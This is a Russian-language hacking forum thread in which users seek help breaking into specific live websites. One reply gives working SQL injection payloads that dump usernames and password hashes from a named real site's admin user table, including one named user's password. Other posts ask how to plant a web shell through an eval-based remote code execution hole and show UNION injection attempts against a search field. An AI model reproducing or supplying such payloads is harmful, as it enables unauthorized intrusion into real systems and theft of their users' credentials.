31.03.2020, 14:21
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Хелп, помогите раскрутить
Код:
https://www.mpisoc.mpg.de/sozialrecht/publikationen/detail/publication/a'/
|
|
|
01.04.2020, 00:28
|
|
Новичок
Регистрация: 09.05.2018
Сообщений: 22
С нами:
4218806
Репутация:
12
|
|
Сообщение от DezMond™
↑
Хелп, помогите раскрутить
Код:
https://www.mpisoc.mpg.de/sozialrecht/publikationen/detail/publication/a'/
/sozialrecht/publikationen/detail/publication/a'=(extractvalue(0x0a,concat(0x0a,(select(group_co ncat(concat_ws(0x3a,username,password)))from(be_us ers)))))='a/
a'=(extractvalue(0x0a,concat(0x0a,(select(group_co ncat(substring(password,20,30)))from(be_users)wher e(username='rtisch')))))='a/
|
|
|
|
03.04.2020, 06:14
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
Хочу логировать все POST запросы к серверу, есть ли такая возможность без рута? Аналог tcpdump или какие-нибудь другие методы
|
|
|
|
03.04.2020, 12:01
|
|
Постоянный
Регистрация: 16.11.2018
Сообщений: 620
С нами:
3943766
Репутация:
47
|
|
Сообщение от pinch
↑
Хочу логировать все POST запросы к серверу, есть ли такая возможность без рута? Аналог tcpdump или какие-нибудь другие методы
Мониторинг трафика требует прямого обращение к сетевому интерфейсу и потому права рута (ну или права группы netdev). Возможно настроить апач/ nginx что-бы они все сливали в лог. Вариант номер 3 это приписать логирование в приложение.
|
|
|
|
12.05.2020, 06:29
|
|
Новичок
Регистрация: 04.11.2017
Сообщений: 13
С нами:
4486646
Репутация:
2
|
|
Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю
|
|
|
|
12.05.2020, 12:14
|
|
Новичок
Регистрация: 09.05.2018
Сообщений: 22
С нами:
4218806
Репутация:
12
|
|
Сообщение от holdik
↑
Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю
создать файл, данные постом передать
|
|
|
|
13.05.2020, 06:19
|
|
Познающий
Регистрация: 09.02.2020
Сообщений: 43
С нами:
3295766
Репутация:
3
|
|
Сообщение от holdik
↑
Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю
Запрещены где ? На хосте или waf-ом ?
|
|
|
|
14.05.2020, 13:21
|
|
Новичок
Регистрация: 07.07.2009
Сообщений: 2
С нами:
8865939
Репутация:
0
|
|
подскажите как заюзать и достать бд
Код:
?search=-")+or+1=1+limit+10--+-
выодит 10 записей
Код:
?search=-")+order+by+1--+-
ошибки нет, но при order by 2 ошибка
Код:
?search=-")+union+select+1--+-
не выводит "1".
думал там какая то разновидность такого запроса. то есть вероятней всего результат первого запроса (уявимого) передается в WHERE для второго запроса
Код:
ids = SELECT id FROM users
WHERE group="XXXX" AND (name LIKE "%$GET['search']%" OR email LIKE "%$GET['search']%"
)
SELECT * FROM users WHERE id IN(ids)
сделал запрос типа
Код:
?search=-")+union+select+217--+-
где 217 это мой id. но результат пустой( |
|
|
|
14.05.2020, 21:40
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами:
5710646
Репутация:
24
|
|
|
|
|
|
16.05.2020, 20:39
|
|
Новичок
Регистрация: 07.07.2009
Сообщений: 2
С нами:
8865939
Репутация:
0
|
|
апдейт к предыдущему посту.
Код:
") union select 1 -- -
ошибка нет, 1 не выводит
Код:
") or id=2 union select 1 -- -
ошибка |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
